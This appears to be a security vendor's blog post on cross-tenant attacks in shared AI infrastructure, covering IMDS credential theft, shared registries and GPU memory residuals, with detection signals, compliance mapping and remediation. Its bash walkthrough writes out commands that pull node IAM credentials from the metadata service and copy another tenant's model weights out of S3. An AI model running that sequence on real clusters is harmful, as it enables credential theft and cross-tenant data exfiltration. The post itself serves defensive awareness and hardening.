The Pipe Crawl: How Shared AI Compute Lets Attackers Slide Between Tenants

L
Liad Matusovsky
The Pipe Crawl: How Shared AI Compute Lets Attackers Slide Between Tenants
Share
🚰
The Pipe Crawl. Attackers are bypassing the thick walls of container isolation by sliding through the cluster's shared plumbing - shared node identity, shared registries, shared GPU memory - to emerge inside other tenants' data. If you share hardware in the AI ecosystem, you should assume you share risk and potentially share data.

Executive Summary

  • We track this pattern as The Pipe Crawl: a single compromised AI workload sliding through shared GPU VRAM, shared Kubernetes networking, and shared node identity to reach every other tenant on the same cluster.
  • GPU cost pressure is driving dense multi-tenancy in AI inference platforms, which collapses container boundaries into shared plumbing.
  • One compromised workload can pivot to other organizations' models, data, and credentials via IMDS, registry poisoning, or GPU memory residuals (CVE-2023-4969, "LeftOvers").
  • Until you isolate hardware, registries, and node identity, one customer's breach is every customer's breach on the same cluster.
  • Arrakis treats every AI workload as untrusted by default and tags every inference request with a tenant identity, so a Pipe Crawl attempt fails at the boundary instead of at the audit.
The Pipe Crawl: shared plumbing between isolated cells.
The Pipe Crawl: shared plumbing between isolated cells.

Scope & Assumptions

🎯
Applies to: Multi-tenant AI inference and training platforms where workloads from different organizations share a Kubernetes cluster, a GPU, a node IAM role, or a container registry - the "pipes" between cells. Does not apply to: Single-tenant or fully air-gapped deployments where each customer has dedicated hardware, dedicated registries, and dedicated cloud identity. Required preconditions for the full Pipe Crawl chain: (1) attacker can execute code inside one tenant workload, (2) workload has reachable IMDS or shared GPU memory, (3) blast radius is not contained by network policy or hardware isolation.

Why this matters

Multi-tenancy turns one breach into many.

When AI platforms optimize for utilization, they often treat containers and namespaces as a hard boundary. In practice, that boundary is soft, and the pipes between cells are wide:

  • Kubernetes misconfigurations and over-privileged nodes make lateral movement realistic.
  • Shared build systems and registries expand blast radius across tenants.
  • GPU memory reuse can leak data even when network paths are locked down.

The walls look like concrete. The plumbing is what carries the breach.

Container walls feel solid. The plumbing is what carries the breach.
Container walls feel solid. The plumbing is what carries the breach.

The Origin Story (Discovery)

The illusion of "secure multi-tenancy" in AI platforms collapses when you stop looking only at the models and start looking at the infrastructure they run on.

A strong demonstration came from Wiz Research, who analyzed Hugging Face's tenant-isolation architecture. The initial access path was not exotic. It used a malicious pickle model (a known vector) to obtain code execution and a reverse shell.

From there, the escalation path looked like classic cloud compromise:

  • Query the Amazon EKS Instance Metadata Service (IMDS)
  • Extract node-level IAM credentials
  • Use those credentials to enumerate and access other customers' assets sharing the cluster

In parallel, researchers highlighted another critical risk: Hugging Face Spaces accepted user-provided Dockerfiles with insufficient build isolation. That made it possible to write into a centralized container registry serving all platform customers.

Finally, CVE-2023-4969 ("LeftOvers") demonstrated that isolation can fail at the silicon level. GPU memory reuse can expose residual data from other tenants that previously shared the same physical GPU.

Message: if you share hardware in the AI ecosystem, you should assume you share risk and potentially share data.


The Technical Autopsy: Crawling the Pipes

The Pipe Crawl starts with an entry vector and then traverses one or more pipes between cells. The entry vector is most often the pickle pipe - code execution from a malicious model upload, poisoned RAG document, or CI/CD injection. Once inside, four pipes connect the compromised cell to every other tenant on the cluster:

  1. The IMDS pipe - reach the host's metadata service from inside a pod and steal the node IAM role
  2. The Identity pipe - use that node identity to call cloud APIs the pod was never meant to call
  3. The Registry pipe - poison or pull from a shared container registry that serves every tenant
  4. The GPU VRAM pipe - read residual memory left by a previous tenant's inference job

Most real-world Pipe Crawls chain pipes 1, 2, and either 3 or 4. The IMDS and Identity pipes are the fastest path; the GPU VRAM pipe is the stealthiest.

ArrowPipeWhat flows through it
━━IMDS pipeCompromised pod → host metadata service to steal the node IAM role
━━Identity pipeNode IAM role → cross-tenant cloud API calls (S3, ECR, secrets)
━━Registry pipeCompromised pod → shared container registry; ╌╌ poisoned images served to other tenants
━━GPU VRAM pipeCompromised pod → same physical GPU; ╌╌ residual VRAM from previous tenant's job is readable

Framework mapping: MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and AML.T0049 (Exploit Public-Facing Application) cover the pickle entry and the boundary escape. AML.T0024.001 (Infer Training Data Membership) maps the GPU residual case. OWASP LLM03 Supply Chain and LLM05 Improper Output Handling anchor the pickle entry point.

The cleanest illustration is to walk the chain end to end. We start inside a container on a shared EKS node - the pickle pipe has already given us code execution via a malicious model upload. Every line below is a real command an attacker runs, in order.

bash
# STAGE 1 - The IMDS pipe: steal the node's IAM identity from inside our pod.
# EKS managed node groups commonly ship with httpPutResponseHopLimit = 2,
# which means a container can reach the host's IMDS even when IMDSv2 is "enforced".
TOKEN=$(curl -sX PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/)

curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
# {
#   "AccessKeyId":     "ASIA...",
#   "SecretAccessKey": "...",
#   "Token":           "...",
#   "Expiration":      "2026-01-29T18:30:00Z"
# }

# STAGE 2 - Wear the node's identity in our own shell.
# This role is attached to the host, not the pod. Every workload scheduled on
# this node - including other tenants' pods - shares it.
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."

# STAGE 3 - Cross-tenant access via the Identity pipe: read assets we never owned.
# Enumerate every S3 bucket this node role can see. The result almost always
# includes other customers' model and dataset buckets.
aws s3 ls

# Walk into a competing tenant's private model bucket and exfiltrate weights
# using the cluster's own credentials. To S3, this looks like normal cluster traffic.
aws s3 cp s3://acme-prod-models/checkpoint.safetensors ./loot.safetensors

The threat lands at the JSON drop in Stage 1: AccessKeyId, SecretAccessKey, Token are node-level cloud identity, not pod identity. By Stage 3 the attacker is reading a competing tenant's model weights with the cluster's own credentials - no zero-day, no exploit, just the plumbing the platform itself wired up.

If an attacker can exploit a GPU memory side-channel (CVE-2023-4969), they may not need a network path at all. They can allocate GPU memory and read residual, un-wiped VRAM left behind by another tenant's inference job. No alert fires, because nothing crossed the network boundary.


Attacker Goals and Impact

The Pipe Crawl is optimized for espionage and mass data theft.

AI platforms centralize high-value assets:

  • Proprietary model weights
  • Customer datasets
  • Source code and internal documentation
  • Sensitive user conversations and prompts

By targeting shared compute infrastructure rather than a single application, attackers gain economy of scale. One Pipe Crawl can compromise dozens of organizations in a single chain, and it can trigger regulatory exposure under SOC 2, GDPR, and the EU AI Act.


Detection & Response

This is the operational layer. Each signal below is tagged with the pipe it monitors so the reader knows where the alert lives in the architecture.

PipeSignalWhat to alert on
IMDS pipeIMDS access from containerAny HTTP request to 169.254.169.254 originating from a pod CIDR
IMDS pipeIMDSv1 fallbackRequests to IMDS without the X-aws-ec2-metadata-token header
Identity pipeSTS calls from pod identityAssumeRole or GetCallerIdentity from a node role inside a workload namespace
Registry pipeCross-namespace registry pullsImage pulls referencing a tenant-foreign namespace path
GPU VRAM pipeResidual access patternWorkloads allocating GPU memory immediately after another tenant's job ends on the same device
Search container egress for any traffic to 169.254.169.254 - should be zero in a hardened cluster
Audit every pod with hostNetwork: true or unrestricted IMDS hop limit
Review CloudTrail for sts:AssumeRole calls where the source identity is a node role and the session is initiated from a workload subnet
Diff your container registry's image push history against your tenant-to-namespace map - any cross-tenant pushes are P0
Validate that GPU scheduling policy enforces tenant-pinning or VRAM scrubbing between jobs
Isolate the suspect pod and snapshot the node before terminating
Rotate the node IAM role credentials immediately, do not wait for STS expiry
Enumerate every customer whose workload ran on the same node in the last 24h - they are all in scope
Pull the registry audit log; check for any image push from the compromised namespace
If the GPU was shared, treat all other tenants on that physical GPU as potentially exposed and notify per breach-disclosure SLA
File the incident with mapping to AML.T0010 and LLM03 for downstream reporting

Governance & Assurance

This section answers three questions: are we exposed, what are we accountable for, and what proves we are handling it.

  • The Pipe Crawl is an infrastructure-layer failure, not a model-layer failure. It does not show up in model evaluations, red-team transcripts, or prompt-injection benchmarks. It surfaces in cloud security posture, Kubernetes hardening, and supply-chain controls.
  • A single Pipe Crawl event is a multi-customer breach event by definition. Disclosure obligations, contractual MSAs, and regulator timelines are triggered for every co-tenant on the affected node, cluster, or GPU - not just the one that was first compromised.
FrameworkRelevant controlRequired evidence
SOC 2 (CC6.1, CC6.6)Logical access boundaries between tenantsNetwork policy, IAM segmentation, registry isolation
ISO 27001 A.8.22Segregation of networksPer-tenant namespace and network policy proof
NIST AI RMF (Manage 2.3)Third-party AI risk managementInventory of shared AI infra dependencies
GDPR Art. 32Security of processingDemonstrable hardware or cryptographic isolation for personal data workloads
EU AI Act (Art. 15)Cybersecurity of high-risk AI systemsDocumented isolation architecture and breach-containment design
Which of our AI workloads run on shared infrastructure with workloads from other organizations?
Is IMDSv2 enforced with hop limit 1 on every node hosting AI workloads?
Do we have a documented blast-radius map for each shared cluster, registry, and GPU pool?
Can we produce, for any customer, the list of co-tenants their data shared hardware with in the last 12 months?
What is our defined breach-notification path when the affected party is a co-tenant rather than the primary customer?

The Fallout (Systemic Failure)

The root cause is a business tradeoff, not a technical inevitability.

To offset GPU cost, platforms pack as many workloads onto a cluster as possible. That density frequently comes with:

  • Shared container registries
  • Permissive cross-namespace networking
  • Over-privileged nodes
  • IMDS exposure from workloads
  • GPU pools with no scrubbing between tenants

Wiz Research and LeftOvers are reminders that treating containerization as a hard security boundary is a mistake. The container is the cell. The cluster is the prison. The pipes are how you get out.


How Arrakis sees The Pipe Crawl

Most AI security tooling stares at the cell door - the model, the prompt, the output filter. The Pipe Crawl is what happens when you stop watching the door and start watching the pipes: the shared GPU, the shared cluster, the shared registry, the shared node identity.

We see The Pipe Crawl as the canonical example of a Tier 3 cross-boundary violation: an attack that uses an AI workload as a beachhead but spends most of its life cycle in classic cloud-infrastructure territory. That is why model-layer guardrails miss it entirely, and why posture tools that do not model tenancy cannot tell you who is actually exposed when one tenant is compromised.

Arrakis approaches multi-tenant AI infrastructure from three angles:

  • Tenant identity at the request layer - every inference and tool call is tagged with a tenant, so cross-tenant access fails closed instead of leaking through shared identity
  • Blast-radius mapping for the pipes - continuous inventory of which workloads share clusters, GPUs, and registries, so a single compromise produces a deterministic list of co-exposed tenants
  • AI-aware detections for the cloud control plane - the IMDS, STS, registry, and GPU-residual signals from the Detection section above, correlated against AI workload identity rather than just pod identity

Remediation

Engineering teams should design AI infrastructure assuming containers will be breached. Close the obvious pipes this sprint, then re-pour the walls this quarter.

Block egress to 169.254.169.254 from all AI workload pods
Enforce IMDSv2 with hop limit 1 on every node hosting AI workloads
Apply default-deny NetworkPolicy between AI workload namespaces
Audit and rotate any node IAM role attached to a workload that runs untrusted user code
Disable user-supplied Dockerfiles writing into shared registries; isolate builds per tenant
Move sensitive customer workloads onto dedicated GPUs and dedicated nodes
Implement VRAM scrubbing or tenant-pinned GPU scheduling to mitigate LeftOvers-class residuals
Stand up tenant-tagged request enforcement at the inference gateway
Produce and continuously maintain a co-tenancy map for breach-notification readiness
Add Pipe Crawl scenarios to red-team scope and tabletop exercises
Indicator TypeValueDescription
VulnerabilityCVE-2023-4969"LeftOvers" vulnerability describing GPU memory leaks that enable cross-tenant data exfiltration.
Network Target169.254.169.254The cloud Instance Metadata Service (IMDS) IPv4 endpoint, commonly targeted during container escapes.
Attack VectorIMDS EKS EscapeEscalation from container execution to node-level credentials via Amazon EKS IMDS.
Attack VectorShared Container RegistryInsufficient build isolation allowing rogue Dockerfiles to poison centralized registries serving multiple customers.

The walls of container isolation are advertised as concrete. The Pipe Crawl is the reminder that every cluster also has plumbing, and the plumbing connects every cell. Until the pipes are isolated, the threat model is shared, and so is the breach.

Stay in the loop

Get the latest from Arrakis Security delivered to your inbox.

Related Articles